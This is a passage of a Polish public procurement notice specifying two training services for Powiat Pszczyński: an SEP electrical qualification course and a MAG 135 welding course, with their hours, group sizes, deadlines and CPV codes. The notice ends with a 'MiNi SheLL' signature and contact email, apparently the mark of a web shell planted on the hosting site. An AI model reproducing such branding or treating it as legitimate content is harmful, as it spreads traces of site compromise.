a.	Celem kursu jest przygotowanie uczestników do egzaminu kwalifikacyjnego, uprawniającego do eksploatacji urządzeń, instalacji i sieci elektroenergetycznych o napięciu nie przekraczającym 1 kV, - Grupa 1 - uprawnienia SEP - Urządzenia, instalacje i sieci elektroenergetyczne wytwarzające, przetwarzające, przesyłające i zużywające energię elektryczną:
1.	Urządzenia prądotwórcze przyłączone do krajowej sieci elektroenergetycznej bez względu na wysokość napięcia znamionowego; 
2.	Urządzenia, instalacje i sieci elektroenergetyczne o napięciu nie wyższym               niż 1 kV; 
3.	Urządzenia, instalacje i sieci o napięciu znamionowym powyżej 1 kV; 
4.	Zespoły prądotwórcze o mocy powyżej 50 kW; 
5.	Urządzenia elektrotermiczne; 
6.	Urządzenia do elektrolizy; 
7.	Sieci elektrycznego oświetlenia ulicznego; 
8.	Elektryczna sieć trakcyjna; 
9.	Elektryczne urządzenia w wykonaniu przeciwwybuchowym;
 
b.	Tematyka prowadzonego szkolenia opracowana powinna być w zakresie niezbędnym do przygotowania do egzaminu w ww. zakresie dla uczniów/absolwentów szkół ponadgimnazjalnych kształcących się w zawodach: technik mechatronik, elektryk, monter - elektronik. 
c.	Tematyka prowadzonego kursu nie będzie obejmować  prac pomiarowo - kontrolnych.

d.	W kursie uczestniczyć będzie maksymalnie 4-osobowa grupa uczniów/absolwentów szkół ponadgimnazjalnych.
e.	Termin wykonania zamówienia:  do 31 grudnia 2012r.
f.	Liczba zajęć nie może być mniejsza niż 24 godziny/na osobę, przy czym  godzina zajęć wynosić będzie 45 minut.
g.	Zamawiający udostępni nieodpłatnie sale szkoleniowe w placówkach oświatowych, których organem prowadzącym jest Powiat Pszczyński, a zajęcia  mogą odbywać się od poniedziałku do soboty. 
h.	Osoba kończąca szkolenie otrzymuje zaświadczenie o ukończeniu kursu, uprawnia ono do przystąpienia do egzaminu kwalifikacyjnego na uprawnienia państwowe wydane przez Stowarzyszenie Polskich Energetyków.
i.	Wykonawca winien opracować harmonogram przeprowadzenia szkolenia w oparciu o ustaloną częstotliwość spotkań z określeniem czasu jego trwania z uwzględnieniem wszystkich godzin.
j.	Wykonawca musi zapewnić wyposażenie dydaktyczne, urządzenia niezbędne dla przeprowadzenia kursów oraz pozostałe wymagania zgodnie z warunkami wynikającymi z odrębnych przepisów.
k.	Dokumentacja szkolenia, zaświadczenia, certyfikaty, materiały szkoleniowe oraz sala dydaktyczna winny być oznakowane przez Wykonawcę poprzez umieszczanie logo typów UE, EFS, POKL i nazwą projektu.
l.	Ubezpieczenie uczestników kursu od następstw nieszczęśliwych wypadków powstałych w trakcie trwania kursu oraz w drodze na zajęcia i powrotnej z zajęć do miejsca zamieszkania ponosi Zamawiający..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.53.00.00-8, 80.53.12.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CZĘŚĆ D - USŁUGA ZORGANIZOWANIA I PRZEPROWADZENIA KURSU SPAWANIA MAG 135.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ D - USŁUGA ZORGANIZOWANIA I PRZEPROWADZENIA KURSU SPAWANIA MAG 135

a.	Kurs spawania MAG 135 (moduł pierwszy) obejmuje kurs spawania blach i rur spoinami pachwinowymi. Celem kursu jest teoretyczne i praktyczne przygotowanie uczestników do egzaminu końcowego wg normy PN-EN-287-1-2 wytycznych Instytutu Spawalnictwa. W wyniku otrzymania pozytywnej oceny z egzaminu końcowego ukończonego kursu spawania uczestnicy kursu uzyskują uprawnienia do wykonywania spoin pachwinowych blach i rur metodą MAG (135) zgodnie z obowiązującymi przepisami i aktualnymi normami dotyczącymi przeprowadzenia egzaminów kwalifikacyjnych spawaczy. 
b.	Kurs kończy się przystąpieniem uczestnika do egzaminu, przeprowadzonego pod nadzorem Instytutu Spawalnictwa. Po pozytywnie zdanym egzaminie uczestnik otrzymuje świadectwo spawacza.
c.	Liczba uczestników przedmiotowego kursu wynosić będzie maksymalnie 37 osób, z podziałem na  trzy grupy dla zajęć teoretycznych:
1.	Grupa I.-  do 8 osób - termin rozpoczęcia kursu - od dnia podpisania umowy;
2.	Grupa II.- do 15 osób; Grupa III.- do 14 osób  - termin rozpoczęcia kursu - od 15 grudnia 2012r.
Zajęcia praktyczne odbywają się w grupach max. 3 osobowych;
d.	Liczba zajęć teoretycznych nie może być mniejsza niż 26 godzin/na osobę, przy czym  godzina zajęć teoretycznych wynosić będzie 45 minut.
Liczba zajęć praktycznych nie może być mniejsza niż 120 godzin/na osobę, przy czym godzina zajęć praktycznych wynosić będzie  60 minut.
e.	Termin wykonania zamówienia: od dnia podpisania umowy do 15.03.2013r


f.	Osoby zakwalifikowane do udziału w kursie w pierwszej kolejności powinny zostać skierowane na badania celem stwierdzenia istnienia lub braku przeciwwskazań zdrowotnych do wykonywania zawodu spawacza. Wykonawca zobowiązany jest do poniesienia kosztów związanych z przeprowadzeniem badań lekarskich dla każdego uczestnika kursu. Badania winny być przeprowadzone przed rozpoczęciem zajęć teoretycznych.
g.	Zamawiający udostępni nieodpłatnie sale szkoleniowe w placówkach oświatowych, których organem prowadzącym jest Powiat Pszczyński, dla potrzeb prowadzenia zajęć teoretycznych, w dniach od poniedziałku do soboty.
h.	Wykonawca zapewni wyposażenie dydaktyczne, urządzenia niezbędne dla przeprowadzenia kursu oraz pozostałe wymagania zgodnie z warunkami wynikającymi z odrębnych przepisów, oraz zapewni bazę do prowadzenia zajęć praktycznych zgodnie z wymogami wynikającymi z odrębnych przepisów. 
i.	Wykonawca winien opracować harmonogram przeprowadzenia szkolenia w oparciu o ustaloną częstotliwość spotkań, z określeniem czasu jego trwania, z uwzględnieniem wszystkich godzin.
j.	Wykonawca zobowiązany będzie uzgadniać terminy zajęć praktycznych każdorazowo z uczestnikiem kursu - w godzinach nie kolidujących z zajęciami szkolnymi.
k.	Dokumentacja szkolenia, zaświadczenia, certyfikaty, materiały szkoleniowe oraz sala dydaktyczna winny być oznakowane przez Wykonawcę poprzez umieszczanie logo typów UE, EFS, POKL i nazwą projektu.
l.	Ubezpieczenie uczestników kursu od następstw nieszczęśliwych wypadków powstałych w trakcie trwania kursu oraz w drodze na zajęcia i powrotnej z zajęć do miejsca zamieszkania ponosi Zamawiający..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.53.00.00-8, 80.53.12.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.03.2013.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com